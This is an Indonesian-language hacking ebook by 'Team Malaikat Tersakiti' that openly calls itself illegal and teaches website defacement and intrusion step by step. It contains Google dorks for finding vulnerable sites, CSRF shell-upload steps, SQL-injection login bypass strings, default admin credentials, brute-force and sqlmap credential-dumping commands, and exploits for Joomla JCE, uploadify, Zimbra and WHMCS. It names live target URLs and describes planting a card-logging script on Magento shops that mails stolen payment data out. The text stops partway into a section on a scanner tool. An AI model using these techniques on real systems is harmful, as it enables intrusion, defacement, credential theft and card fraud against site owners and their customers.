Anda di halaman 1dari 96

ASSALAMUALAIKUM WR WB KALI INI KAMI TEAM MALAIKAT

TERSAKITI MEMBUAT SEBUAH EBOOK UNTUK KALIAN SEMUA EBOOK


INI ILEGAL KARENA SEMUA ISI DI DALAM EBOOK INI DI AJARKAN
CARA MERUSAK SISTEM ATAU MENGHACK WEBSITE EBOOK INI
COCOK UNTUK KALIAN YANG SUKA DEFACE AND HACKING JADI
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG AKAN KALIAN
PERBUAT SEMUA TUTORIAL DAN ISI DI DALAM EBOOK INI SUDAH
KAMI COBAK DAN SEMUA WORK.

Dalam dunia Hacking tidak ada yang instants


dan bisa berhasil dengan mudah! Mereka yg
berhasil adalah mereka yg selalu sabar
berusaha dan terus mencoba!" By MALAIKAT
TERSAKITI.
DAFTAR ISI
1.Deface Dengan CSRF (Cross Site Request Forgery

2.Deface Dengan Teknik Bypass Admin Login Dengan SQL Inject

3.Deface Dengan CSRF Balitbang

4.Cara Crack Cpanel Dengan Python 2016 untuk Deface

5.Teknik Joomla Bruteforce

6.cara deface Dengan Remote Shell Upload Vulnerability

[uploadify] | Wndows 7

7.Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension | Remote File Upload
Vulnerability

8.Tutorial Lengkap Defcae Magento by yuzac0de

9.Tutorial SQL injection Menggunakan SQLMAP

10.Deface Dengan Exploit Zimbra

11.Cara Deface Web Dengan Exploit JCE Joomla Extension V3

12.Deface Web Dengan Default Password (MNET Solution)

13.Deface Dengan Teknik Jumping

14.Cara Mendapatkan WHM Dan cPanel Unlimited Gratis Dengan Exploit WHMCS 2016

15.CARA UPDATE ATSCAN PERL NASKAH UNTUK RENTAN SERVER, SITUS DAN SCANNER
DORK

16.Com_fabrik Upload Vulnerability

17.Deface CMS Joomla Dengan Metode Exploit Joomla COM_USER 2016

18.Cara Tamper Data (Upload PHP file)

20.Com_fabrik Upload Vulnerability

21.Bypass shell Defacing web Wordpress type

22.Cara Hack Bandwith Warnet Dengan CMD Terakurat

23.Tutorial Deface Dengan Com_Adsmanager


24TEKNIK HACK CCTV

25.cara hack wifi dengan JUMPSTART + WPS-PIN

26.Imrat Hack komputer Jarak Jauh

27.FREE TOOL HACKING

1.Deface Dengan CSRF (Cross Site Request Forgery)


Malam semua kali ini Team Malaikat Tersakiti akan sedikit membagikan teknik deface
dengan cara CSRF (Cross Site Request Forgery) Mungkin dari kalian ada yang sudah sering
dengar teknik ini teknik ini sudah lama di gunakan para Deface teknik ini khusus untuk yang
belum mengerti teknik CSRF ini langsung aja ke TKP

Bahan-bahan

- kopi

- makanan

1. Download Script CSRF nya

=========================

DiSINI (http://www.mediafire.com/download/2cdxocz5ispa7dg/CSRF.html)

=========================

2. Download madspotshell nya

=========================

DISINI (http://www.mediafire.com/download/b78byq28a461tad/madspotshell.rar)

=========================

3. Cari target dengan DORK :

 inurl:/wp-content/themes/shepard
 inurl:/wp-content/themes/money
 inurl:/wp-content/themes/clockstone
 inurl:/wp-content/themes/ambleside
 inurl:/wp-content/themes/pacifico

4. BERDOA JANGAN LUPA

kalau bahan udah ready langsung aja eksekusi !!


Langkah-langkah :

1. Maukan dork nya (lihar gambar)

2. Pilih salah satu target (gambar dibawah)

Contoh :

http://maynetree.com/wp-content/themes/Clockstone/images/ ganti menjadi

http://maynetree.com/wp-content/themes/Clockstone/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" /


"upload.php"

Note: Jika muncul "You Must Login....."atau blank? cari target lain "Jika
muncul "error" berarti Web target Vulnerable

4. Buka file CSRF.html yang tadi sudah di download dengan notepad,


ganti URLTARGET dengan link yang berada di addres bar target kamu
tadi. Lihat Gambar! lalu save!

Contoh:

"http://maynetree.com/wp-content/themes/Clockstone/theme/functions/upload-
bg.php"

5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik
upload.

6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini
Selesai :D
Selesai :D

Sumber:Google.com
2.Deface Dengan Teknik Bypass Admin Login Dengan SQL Inject

Kali ini TeamMalaikat Tersakiti akan membagikan sedikit teknik deface Bypass Admin
Login dengan SQL inject teknik ini kami dapetkan dari semua blog garuda securit
hacker.karena menurut Team UNDERGROUD teknik ini bagus maka kami juga menshare
langsung aja ke TKP.

Bahan Bahan

1. Koneksi Internet

2. Script Deface

3. Dork : inurl:/?mnux=login

"Powered by Sisfo Kampus"

Dork bisa kembangkan sendiri.

Tutorial :

1. Dorking dulu di google dengan dork di atas .

2. Setelah muncul web hasil dorking pilih yang menurut kamu (vuln)

4. Setelah membuka webnya kalian akan di antarkan ke tempat login.

5. Jika tidak langsung berada di tempat login kalian tinggal tambahkan /?mnux=login di
belakang url.

web nya. Contoh www.sitetarget.com/?mnux=login

6. Begini tampilan tempat login nya.

7. Pilih login dengan "Superuser"


8. Setelah di menu login "Superuser" kalian masukan inject '=''or' di username dan password.
Lihat gambar lalu klik login.

9. Setelah berhasil masuk dengan inject, kalian pilih menu Master di tabel atas (lihat tanda
merah) lalu pilih menu Mahasiswa.

10. Setelah pilih, kalian edit profile mahasiswa nya (lihat gambar)

11. Lalu klik edit foto (lihat gambar)


12. Lalu upload script deface kalian yg berekstensi .html.

13. Setelah selesai upload, untuk lihat hasil defacean nya, kalian bisa klik kanan pada gambar
yg hancur, lalu klik view image (lihat gambar)

Ini hasil defacean saya.


Sumber:google.com
3.Deface Dengan CSRF Balitbang
DORK :

 inurl:member/daftar.php intext:NAMAKOTA
o inurl:/sch.id Team balitbang intext:NAMAKOTA
o intext:"Kamfret Team"sch.id Team Balitbang
o inurl:member/daftar.php

*Cari Nama kota-kota indonesia di Google , WIKI atau BMKG :)

2. CSRF Bisa ambil DISINI , (http://pastebin.com/ywqHVKje) Save Dengan Ektensi


.HTML

3. Shell.php , Jika tidak punya bisa pakai shell recoded ini Shell
(http://malaikattersakiti.blogspot.co.id/2016/07/shell-rabbit-security.html)

Kemudian masukan Exploit : member/daftar.php sampai muncul seperti gambar


dibawah.

Lalu isi Formulir tersebut, Untuk Username ID Password Email isi dengan benar & pastikan
Email Aktif Untuk Yg Lain di isi asal juga bisa.

Jika sudah di isi semua Klik Simpan & Muncul seperti gambar dibawah.
Lalu cek email Terkadang masuk kedalam Spam Jika sudah Klik VALIDASI
MEMBER
Kemudian Login dengan Username & Password yg kamu isi tadi

Jika sudah login maka muncul tampilan seperti gambar dibawah.

Copy Link Target tersebut sampai sch.id saja


Buka CSRF dengan notepad & Paste Link target di bagian http://site.sch.id/

Kemudian Save Lalu buka CSRF Dgn Mozilla Jika sudah dibuka maka muncul tampilan
CSRF Klik Browse & pilih shell mu lalu upload :v

Jika ada tulisan berhasil seperti digambar berarti shell sudah ter upload :D

Shell Akses : site.sch.id/materi/file.php Selesai. Sumber:Google.com


4.Cara Crack Cpanel Dengan Python 2016 untuk Deface

Langsung saja siapkan bahan:

 Python27 Disini (https://www.python.org/downloads/ ) (Download yang versi 2.7)


Install
 Web yang udah ada banyak config/symlink (Hasil dari grabber biasanya)
 Toolsnya
Disini (https://drive.google.com/file/d/0B2Q7AZxVhOHVbUxNMGJDdF9IQmc/vie
w?usp=sharing ) (Copykan ke dalam folder Python27)

 Contoh Config web:

 Install Python sampai selesain.(Klik next" aja)


 Extrac toolsnya tadi di C:\Python27

 Terus Buka CMD atau( tekan windows + R ketik CMD)

 Lalu masukkan perintah :


cd.. sampai ke dir C:

lalu kirim perintah:

cd python27 (nanti masuk dir pythonnya)

Ketikan cp.py (Sampai keluar kek ginian)

Lalu kirim perintah lagi

C:\Python27>cp.py [Nama folder Config/ Symlink/ Mr.HaurgeulisX196/ Mbt kamu]


[Lokasi penyimpan Config]
Contoh: cp.py http://www.site.com/rabbit/ C:\HASIL

Lalu Tekan tombol [ENTER] pada keyboard mu, lalu akan muncul tampilan seperti
Gambar

Tunggu hingga proses berakhir...


Jika sudah selesai akan keluar result passwordnya :D

Copy list password tersebut dengan cara

click kanan -> Mark -> ENTER

Masuk Ke shell sobat yang anda tanem di web config tadi..


dan masuk ke

Cpanel BruteForce

Paste semua list passwordnya yang di dapat tadi

Klik start dan tunggu hasilnya..

Taraaa....
Coba kita test..

Masuk ke halaman login CPanel


ex: http://site.com:2082

Login dehh :D

Shell Rabbitsec DOWNLOAD DI SINI


(https://drive.google.com/file/d/0B2Q7AZxVhOHVVWFUY24zQ3drSVk/view?pref=2&pli=1)
SUMBER:GOOGLE.COM
5.Teknik Joomla Bruteforce

1. Dork: inurl:"/templates/beez5/" intitle:Index of /administrator/

2. Brute v.2 | Download

(http://www.mediafire.com/download/2fxshfeii557trn/Hmei7.zip)

3. Live Target : www.live-target.pusku.com/joomla/

Lanjut lagi :D

Seperti biasa, kalo mau nyari target silahkan gunakan dork, kembangin dorknya biar lebih
yoos :D

Nah, kalo sudah nemu banyak targetnya silahkan kumpulkan dan simpan dalam file
listsite.txt, disini ane cuma satu aja, sekedar buat coba-coba apakah toolsnya masih bekerja
atau tidak dan kalo list passwordnya mau dibanyakin juga boleh.

Selanjutnya kita jalankan Toolnya, lalu klik Load File, pilih file yg berisi web target sobat!
lalu klik open! dan klik Scan...
Tinggal nunggu hasilnya :) yang sabar yah :p

Kalo udah nemu password yang cocok, tinggal login dah!


Nah ternyata toolnya masih bekerja dengan baik :)

Kalo sobat mau coba silahkan saja :) tapi saya ga yakin bisa nemu web yang password mudah
ditebak, :D yah apa salahnya dicoba :v kalo ga dicoba siapa yang tau :v usaha dunk jangan
cuma enaknya doank, wkwkwk :D

SUMBER:GOOGLE.COM
6.Cara Deface Dengan Remote Shell Upload Vulnerability
[uploadify] | Wndows 7
Untuk mempersingkat waktu langsung saja masuk ke tutorial nya, sebelumnya
download dan instal dulu bahan yang diperlukan.

Jika ada link mati silahkan contact admin disini

1. Script Uploadify : download (http://pasted.co/6d81f396)

2. Xampp : download (https://www.apachefriends.org/download.html)

3. Curl : download (https://curl.haxx.se/download/curl-7.30.0.zip)

4. Shell : ( bisa kalian cari sendiri sesuai selera )

Langkah-langkah :

Dork : "templates/bt_foto" & "/templates/bt_metro"

1. Sebelumnya install dahulu Xampp yang sudah sobat download tadi, lalu taruh
extract/taruh file ( Curl, Script Uploadify dan Shell ) kalian pada direktori
C:/Xampp/php setelah selesai, buka file Script Uploadifinya lalu setting sebagai
berikut :
$uploadfile="set.php"; ( set.php adalah nama shell yang saya pakai, set.php bisa
diganti dengan nama shell yang sudah kalian taruh di folder php )

2. Jika sudah sekarang jalankan xamppnya ( klik Start semua )

3. Buka CMD lalu masuk ke direktori php pada xampp ( lihat gambar )

4. Jika sudah ikuti langkah diatas, sekarang waktunya jalankan Script Uploadify (
lihat gambar )
5. Jika keluar path seperti diatas, kemungkinan besar shell sudah berhasil terupload,
sekarang buka browser lalu ubah urlnya menjadi :

http://situs.com/administrator/components/com_bt_portfolio/set.php

6. Dalam contoh shell berhasil saya upload, sekarang terserah kalian mau diapakan
website tersebut >_<

Sekian tutorial yang bisa kami berikan, kurang lebihnya mohon maaf. Jika ada
kendala atau kesulitan dalam mengaplikasikan tutorial pada blog kami.

Tambahan By Onix AQua


Download Xampp terbaru,, bagi yg menggunakan Xampp versi lama dan Kalo
seandainya ada error : Fatal error: Call to undefined function curl_init()
Solvingnya mudah saja,,, buka file php.ini lalu temukan baris extension=php_curl.dll
jika ada tanda titik koma ( ; ) dihapus aja trus simpan lgi. lalu retart Xammp... :)
Command yang tidak jalan di CMD mungkin dikarenakan nama file sudah kalian
ganti, jadi pastikan dahulu nama Script Uploadify, shellnya. Dalam contoh Script
Uploadify diberinama uploadify.php sedangkan shell diberinama set.php
SUMBER:http://indocyberarmy.blogspot.co.id
7.Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension
| Remote File Upload Vulnerability
Oke sobat, sebenarnya Team Malaikat Tersakiti udah lama sih mau share teknik ini, cuma
saya males aja mau nyari targetnya,, soalnya saya jarang nemu target yg Vuln, jadi males
dah,, tapi berkat bantuan dari temen saya yaitu om Agam yang dengan sukarela memberikan
live target yang bisa sobat gunakan :D jadi mempermudah saya untuk berbagi teknik ini buat
sobat2 semua :) Thanks to Om Agam dan perlu sobat ketahui bahwa pada CMS joomla itu
yang paling banyak ditemukan bugsnya itu di component atau Extensinya, rata2 pasti begitu
:)

Udah ah ngomel2nya, langsung saja kita praktekkan :) Disini saya akan menjelaskan dua
Teknik yang berbeda tapi Konsepnya sama aja sih :D beda toolsnya aja :p

Bahan-Bahan :

JCE Exploiter | Download


(http://www.mediafire.com/download/o92549pszdhodcg/JCE+3xploiter.zip)

JCE Exploiter PHP | Download

(http://www.mediafire.com/download/c3iktuiamtiral3/onixidca.php)

Dork :

inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart

Live Target : Lihat

(http://hack-db.com/hacker/VanPersie/all_14.html

Udah disiapin kan bahan2nya? lanjut yuk masak2nya


Pertama lo pasti sobat harus mencari targetnya dulu di Google dengan menggunakan dork
diatas :) kalo saya udah nemu tuh :D

Lalu Extrack dulu file JCE Exploiternya :)

Buka deh JCE Exploiternya :) dan Selanjutnya masukan Targetnya, lalu klik Start

Nah tuh, udah berhasil :)


Setelah berhasil exploitasinya lalu eksekusi link tersebut :)

Nah, upload aja shell sobat :)

Catatan: "kalo ga bisa upload Shell, upload aja file depesan .php .html / .txt :)

Kalo upload shellnya berhasil, tinggal eksekusi shell, trus Tebas dah :D
Cara Kedua

Catatan : Rubah extensi Shellnya dulu menjadi jpg/gif. contoh : shell.jpg / shell.gif

Lalu masukkan targetnya :

Hostname : Web Target [tanpa http:// dan / ]

Path : / atau /path/

Please Specify a file to upload : Shell.jpg sobat :)

Yang lain, kosongin aja :) lalu klik Start


Nah tuh udah keliatan hasilnya :)

Langsung dah, eksekusi shellnya dan upload file depesan sobat :)

Sekian Tutorialnya, mudah2an bermanfaat buat pembelajaran:D

SUMBER:GOOGLE.COM
8.Tutorial lengkap Magento by yuzac0de
-makan

-minuman dingin

-berdoa menurut agama masih-masih

-langsu aja ke TKP

Dork :

- intext:/skin/adminhtml/default/default/

- intitle:computer inurl:account/login/ site:.com

- intitle:computer inurl:account/login/create/ site:.com

- intext:"2016" inurl:account/login site:.com

- "shirt" inurl:customer/account/login/ site:.com

- "jeans" inurl:account/login site:.com

- intitle:shop inurl:account/login/create site:.com

- intext:2016 inurl:customer/account/ site:.com

- ganti site, intitle dan intext dengan apa saja / use your brain !

Ciri cms magento :

LETAK SMTP :
- system > configuration > view menu SMTP pro

- kalau ada SMTP PRO klik dan lihat username, password, port dan server nya

- kalau password masih bentuk ******* ( inspect element > ganti value "password"
dengan "text" )

Upload shell :

- perlu di ketahui tidak semua bisa di tanam shell , atau jika sembarangan tanam
shell webnya bakal error

- kalau vuln dan bisa di tanam shell pergi ke : system > file system > IDE > cari file >
edit UPLOADER atau LANGSUNG EDIT SHELL di dalamnya > save > dan kunjungi
file yang tadi di edit

Ngelog PP&CC :

- tanem shell dulu

- trus masuk ke /app/code/core/Mage/Payment/Model/Method/Cc.php

- masukin skrip logmu

- cari kode ini $yuzamail = "eXV6YWMwZGVyQGFzaWEuY29t";

- ganti eXV6YWMwZGVyQGFzaWEuY29t sama emailmu, nanti log dikirim ksini


(kalau web target support send mail) Cara test send mail ada di bawah..
- jgn lupa encript dulu dgn base64, bisa make punya si x'inject DISINI
(http://www.scriptencode.net/)

Patching bug magento 1.7.0.2

- tanem shell dulu

- masuk ke /app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php

- cari code ini:

protected function _getOptionDownloadUrl($route, $params)


{

return Mage::getUrl($route, $params);


}

- ganti dengan code ini:

protected function _getOptionDownloadUrl($route, $params)

$websites = Mage::app()->getWebsites();

$code = $websites[1]->getDefaultStore()->getCode();

$params['_store'] = $code;

return Mage::getUrl($route, $params);

Cara Upload File System :

*Catatan: jika ada ketidak sesuaian/ditemukan error tdak sperti gambar yg saya
sertakan berarti tidak bisa di upload file system!

- Download dulu file system DISINI

(https://userscloud.com/mspdkv4gueo3)

Pass: yuzanotes.blogspot.co.id

- Masuk ke System > Magento Connect > Magento Connect Manager


- Jika Vuln maka akan muncul form login, jadi lu harus login ulang. Setelah login lu
akan masuk ke halam ini, lihat gambar dibawah, dan upload file systemnya

- Nanti akan otomatis scrolling ke bawah sendiri dan jika sukses akan muncul notif
seperti gambar dibawah.
- Balik lagi ke dashboard admin, scrol ke atas aja terus klik Return to Admin

- Sekarang lihat file system udah terinstall. Dah sampe disini terserah mau diapain.
Untuk cara upload shell baca lagi di atas dah jelas
Email Test Sender :

- Harus nanem shell dulu, gak tau caranya? baca lagi dari atas

- Taruh script di bawah terserah d taruh mana..

- Setelah itu buka lewat url, jika support kirim email akan nampak seperti gambar
dibawah

- Masuk inbox nih :D


SUMBER: yuzanotes.blogspot.co.id AND GOOGLE.COM
9.Tutorial SQL injection Menggunakan SQLMAP
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL
injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat
mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

ok, langsung saja download dulu alat perang nya :

-python 2.7 (https://www.python.org/downloads/)

-sqlmap-0.9.zip (https://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-
0.9.zip/download)

untuk tutorialnya :

1. download kedua file di atas, instal python, extrack sqlmap nya

(misalkan saya extrack di C:\Python27\tool\sqlmap)

2. cari website yg vuln terhadap sqli, (untuk dork bisa lihat di sini)

( http://pastebin.com/dzknXjgP)

ok, saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di di google

3. buka cmd.

setelah itu ketik di cmd "cd [direktori sqlmap tadi yg anda extract]" lalu enter,..

misalnya di sini direktori saya >> C:\Python27\tool\sqlmap

jadi seperti ini :


4. setelah itu masukan perintah : "sqlmap.py -u https://www.target.com/index.php?id=7 --
dbs" tanpa tanda petik lalu enter.

*yang berwarna merah ganti dengan url target mu.

*perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--
dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

maka hasilnya akan seperti ini :

jika muncul pertanyan sejenis atau serupa/sebentuk dan seperti ini

"GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y
lalu enter

kita telah mendapatkan nama databasenya yaitu :

1.*yang saya sensor(dalam hal ini kita namakan saja db_xxx)

2. information_schema

5. setelah itu saat nya kita bongkar isinya , tapi database yang mana ? hmm,...

sepertinya saya tertarik dengan yang db_xxx , kenapa hayoo ? feeling aja :p

lalu kita masukan perintah ini :


sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx --tables [enter]

* yang warna merah url target

* yang warna hijau nama database yang mau di bongkar

fungsi :

-u = url

-D = database

--tables = untuk mendapatkan tables dari database

maka hasilnya seperti ini :

wuihh muncul tablenya xD

[11 tables]

+-------------------+

| areas |

| categories |

| featured |

| fields |

| jobfields |
| member_areas |

| member_categories |

| member_fields |

| members |

| projects |

| users |

+-------------------+

6. sekarang kita lihat dari tabel2 tersebut kira kira user dimna ? , mungkin di tabel user :v

mari kita check dengan perintah:

sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx -T users --columns


[enter]

* yang warna biru, nama tabel yang ingin dilihat columnnya

fungsi :

-T = nama table

--columns = melihat columns di table

maka hasilnya akan seperti ini :


kita telah mendapat kan nama column dari tabel users.

7. sekarang kita akan melihat isi dari column tersebut, dalam hal ini kita cukup melihat isi
dari column password dan username saja, dengan memasukan perintah :

sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx -T users -C


password,username --dump

*yang warna pink, nama column yang ingin dilihat datanya

fungsi :

-C = nama column

--dump = melihat data di column

maka hasilnya seperti ini :

dan tadaaa,... \(^_^)/

kita dapet username ama passwordnya(password masih dalam bentuk hash, jadi tinggal hash
di DI SINI (https://hashkiller.co.uk/md5-decrypter.aspx)

sekarang tinggal ngecrack passwordnya terus cari admin loginnya >> tebass :D

SUMBER: lastc0de.blogspot.com AND GOOGLE.COM


10.Deface Dengan Exploit Zimbra
Bahan-Bahan yang di perluka.

-kopi

-makan ringan dan matikan lampu kamar biyar lebih mantap waktu deface nya kayak di film-
film hhh :D

Ruby ( Pilih yang Rubyinstaller ) (http://www.rubyinstaller.org/downloads/)

Exploit
(http://www.mediafire.com/download/ohovyqgv16dw03q/Exploit+Zimbra_2.zip)

Langkah Installasi dan cara menggunakan nya di CMD

 Install Ruby ( Centang semua )

 Download exploit ( Link ada di atas )


 Setelah di download extract file nya ke ( C:Ruby22\bin )
 Buka cmd ( " Tekan logo windows di keybord + r " ketik com
 Jalan kan perintah nya
 "cd /../../Ruby22/bin" ( TANPA TANDA KUTIP )
 cara exploit nya, ketikkan " run.rb -t http://www.target.com -u [Username] -p [Password] "
tanpa tanda kutip

Untuk mencari target gunakan dorks, untuk kali ini saya cuma memberian 1 dorks

inurl:web client zimbra login site:.id

Langkah mencari target :

 Buka google.com
 Masukkan dork diatas tadi kedalam google
 Contoh : zimbra2.kinez.co.id
 Kemudian liat hasilnya

Wajib install Ruby di disk C

Jika EROR seperti gambar di bawah ini tanda nya tidak vuln, silahkan cari target lain

Sumber:google.com
11.Cara Deface Web Dengan Exploit JCE Joomla Extension V3
Ada 2 cara yang dapat kita gunakan, yaitu dengan JCE Exploiter yang versi .exe & yang versi
.php

JCE Exploiter Versi .exe

1. Download JCE Exploiternya disini


(http://www.ziddu.com/download/22517434/JCE3xploiter.zip.html)

2. Selesai download, anda cari target yang vuln menggunakan dork .

inurl:index.php?option=com_jce

3. Silahkan anda test satu persatu web dari hasil dork apakah web tersebut vuln atau tidak
dengan mencopy url webnya, yaitu : www.site.com

4. Buka JCE Exploiter yang tadi diunduh, lalu klik 2x pada JCE.exe

5. Jika vuln, maka akan keluar url/link shell anda di kolom bawah seperti ini
6. Anda copy link tersebut ke addressbar, maka akan muncul uploader untuk upload shell
anda

7. Untuk membuka shellnya, tinggal rename url di bagian paling belakang, yaitu 3xp.php
menjadi namashellanda.php

8. Maka muncul deh shell anda, eksekusi deh tuh web.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak
bisa upload shell, hanya upload script deface saja

JCE Exploiter Versi .php

1. Download scriptnya disini


(http://downloads.ziddu.com/download/22517878/JCE3xploiter.rar.html)

2. Selesai download, jangan dilupa diekstrak terlebih dahulu

3. Lalu anda upload file php tersebut pada web hosting anda/web hasil deface sebelumnya.

4. Kemudian anda cari target yang vuln menggunakan dork :


inurl:index.php?option=com_jce

5. Nah anda isi deh kolom kolom kosong di JCE.php tadi

- Anda masukkan url target ke kolom "hostname", misal : www.site.com (tidak menggunakan
http://)

- Anda masukkan path target ke kolom "path", misal : webnya www.site.com/v2/, maka
pathnya /v2/ tapi jika tidak ada pathnya isi saja /

- "Please specify a file to upload" adalah untuk memilih shell anda yang akan diupload

- Kolom selanjutnya kosongi saja

6. Selanjutnya klik "start" dan proses exploitasi akan berjalan, jika berhasil maka dibawah
akan muncul tulisan seperti ini

7. Nah anda copy link tersebut ke addressbar, maka shell kesayangan anda akan muncul.
Silahkan deh dieksekusi.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak
bisa upload shell, hanya upload script deface saja

SUMBER:ramadhanlmzero and google.com


12.Deface Web Dengan Default Password (MNET Solution)

1. Cari targetnya di pencarian google menggunakan dork :

inurl:webboard.php?option=answers dork lain kembakan sendiri


2. Setelah itu, anda coba buka salah satu web yang muncul di hasil pencarian.

3. Masuk ke panel admin.

Contoh : www.site.com/siteadmin/

Berikut adalah tampilan panel adminnya

4. Isikan username dan password defaultnya pada kolom yang kosong

Username : superadmin

Password : jocho

5. Setelah itu klik "login"

6. Jika berhasil, url akan berubah menjadi www.site.com/siteadmin/ControlPanel.php

7. Setelah masuk, anda ubah url'nya


dari www.site.com/siteadmin/ControlPanel.php menjadi www.site.com/editor/tinymce/jscript
s/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?editor=form&elementId=iconnew

Berikut adalah tampilannya.


8. Disini anda hanya bisa mengupload file html, jadi anda hanya bisa menyisipkan file deface
saja, bukan upload shell. Anda upload file deface anda dengan klik tombol "upload"
disebelah kiri. Nanti akan muncul sebuah pop up, anda klik "choose file" untuk memilih file
html anda dan klik "upload" untuk menguploadnya.

9. Tunggu beberapa menit hingga file terupload. Jika sudah terupload, buka file deface anda
dengan format : www.site.com/images/namafile.html

10. Taadaa... Muncullah file deface anda

Selamat mencoba ^_^

Sumber : http://ramadhanlmzero.blogspot.com AND GOOGLE.COM


13.Deface Dengan Teknik Jumping
Bahan bahanne:

Shell yg bisa Jumping aja :v ane pake

▐ Shell yang udah ketanem di Sebuah target

▐ Shell Andela (http://www.mediafire.com/download/mvs7bj3keiyr35e/andela.php)

▐ My Sql form Login (http://www.mediafire.com/download/kjnuqkgsik6zxwi/db.php)

Upload My Sql form Login nya dulu :v

Masuk Shell, klik "Jumping" lihat gambarr.

Tuhh ada Hasil nya, segituu ane dapet nya :v Pilih yang mana aja bebas.
Nah liat disitu dia pake Cms apa, kalo Cms Joomla cari "configuration.php" kalo
Wordpress cari "wp-config.php". Berhubung site target jumping ane make Cms Wordpress
jadi ane cari "wp-config.php"

Tuhh keliatan, db_name, db_user, db_password, db_host . kalo udah buka My Sql form
login yang tadi di upload
Masukin data data yang di dapet tadi kalo, contoh nya liat gambar aja, kalo udah klik
"Connect"

Tadi kan target ane Cms nya Wordpress nah jadi disini ane cari "wp_users". kalo target ente
Cms nya Joomla cari aja yang berbau "jos_user".

Nahh kan ketauan User admin Pass dan lain lainn nya :v klik "Edit" Contohnya di gambar.
Nahh di kolom "user_pass" itu di ganti sama password ente Password Md5 yoo kalo belom
ada Create disini (http://md5cracker.org/) kalo udah klik Save / Edit , lihatt gambar.

Masuk ke admin loginnya, Cms Wordpress admin Login nya ada di http://localhost/wp-
login.php kalo Joomla ada di http://localhost/administrator/

kan target ane Cms nya Wordpress jadi ane masuk ke http://localhost/wp-login.php

Masukin User:Pass nya,

joz sekarang sudah masuk ke admin

silahkan lanjutin apa yang kalian mau :D

SUMBER: GOOGLE.COM
Cara Mendapatkan WHM Dan cPanel Unlimited Gratis Dengan
Exploit WHMCS 2016

Mungkin kali ini Team Malaikat Tersakiti akan membhas tentang WHM semua pada tau apa
itu WHM, ya WHM itu adalah singkatan dari "Web Host Manager", WHM ini biasanya di
gunakan untuk membuat cPanel yang berguna sekali bagi para wapper terutama wap
Download,, dan biasanya mereka berburu cPanel Unlimited yang ruang disknya tidak
terbatas, berbeda dengan cPanel biasanya hanya di batasi 300 MB saja..

Dan pada postingan kali ini saya akan berbagi trik yaitu cara mendapatkan WHM dan cPanel
Unlimited secara cuma cuma ( Gratis ).

Oke pertama tama yang harus di lakukan adalah siapkan dulu Xamp atau Hostingan untuk
menjalankan script exploitnya, script bisa anda ambil ( Di Sini )
(http://pastebin.com/raw/CydbK5UP)

Setelah anda mendapatkan scriptnya silahkan upload hosting atau anda jalankan
menggunakan xamp yang ada di PC/Laptop anda.

WHMCS EXPLOIT
Selanjutnya anda masukkan dork berikut ke dalam kotak yang tersedia di form exploit
whmcs.

1. inurl:whmcs/cart.php?a=

2. inurl:billing/cart.php?a=

3. intext: Powered by WHMCompleteSolution

4. inurl:submitticket.php intext: Powered by WHMCompleteSolution

5. inurl:clients/submitticket.php intext: Powered by WHMCompleteSolution

6. inurl:client/submitticket.php intext: Powered by WHMCompleteSolution

7. inurl:clientsarea/submitticket.php intext: Powered by WHMCompleteSolution

8. inurl:clientarea/submitticket.php intext: Powered by WHMCompleteSolution

9. inurl:crm/submitticket.php intext: Powered by WHMCompleteSolution

10. inurl:cp/submitticket.php intext: Powered by WHMCompleteSolution

nah silahkan anda pilih 1 dork di atas kemudian masukkan ke form exploitnya dan klik
"exploit" maka nanti akan muncul result atau hasilnya.. dan dari beberapa result mungkin
yang bisa anda dapatkan 1 atau 2 whm atau tidak dapat sama sekali karena teknik ini
tergantung dork yang anda buat... jika anda dapat maka akan muncul user dan pass
WHMnya..

Dan ini adalah tampilan panel WHM yang saya dapatkan


nah bagi anda yang mau membuat cPanel Unlimited simak tutornya di bawah ini :

1. Buka WHM yang tadi anda dapat dari hasil dorking, setelah itu cari tulisan "Account
Function" dan klik menu tersebut.
2. Setelah di klik maka akan muncul menu baru dan klik tulisan "Create New Account".
Selanjutnya akan muncul form pembuatan akun cPanel baru..
3. Setelah form berhasil di isi tugas anda selanjutnya adalah memilih paket cPanel yang anda
inginkan, dan saya sendiri memlilh paket "Powet_User", ceklis option "Select Option
Manually" maka akan muncul form untuk setting Unlimitednya wkwkwk..
Jika semua sudah beres klik tombol "Creat/Buat" maka cPanel Unlimited anda siap untuk di
gunakan.

SUMBER:GOOGLE.COM
Deface Web Teknik Web Solutions
Skarang saya mau share tutorial Deface "Teknik Web Solutions - Bypass Admin Login
Priv8"

[+] Google Dork:

1 > "Designed & Developed By: Web Solutions"

2> intext:Designed & Developed By: Web Solutions

3> inurl:"/admincp/sdata/msecimgs/"

[+] Login Page

http://www.localhost.com/admincp/

[+] Exploit:

User:admin' or '1'='1

Pass:admin' or '1'='1

Live Target : http://www.tpsurgical.com/admincp/

SUMBER:GOOGLE.COM
CARA UPDATE ATSCAN PERL NASKAH UNTUK RENTAN
SERVER, SITUS DAN SCANNER DORK
Apa yang Baru di 2016:

. + Header perubahan

+ versi Perl

+ jalan Script

+ OS / Platform Versi Cetak

+ dan lebih kegunaan ..

ATSCAN adalah script perl dengan scanner fungsi Dork. XSS scanner. LFI
scanner.Menyaring situs wordpress dan Joomla di server. Cari halaman Admin. Decode /
Encode MD5 + Base64.

MENU :

1 = DORK SCANNER

2 = SITE SCANNER

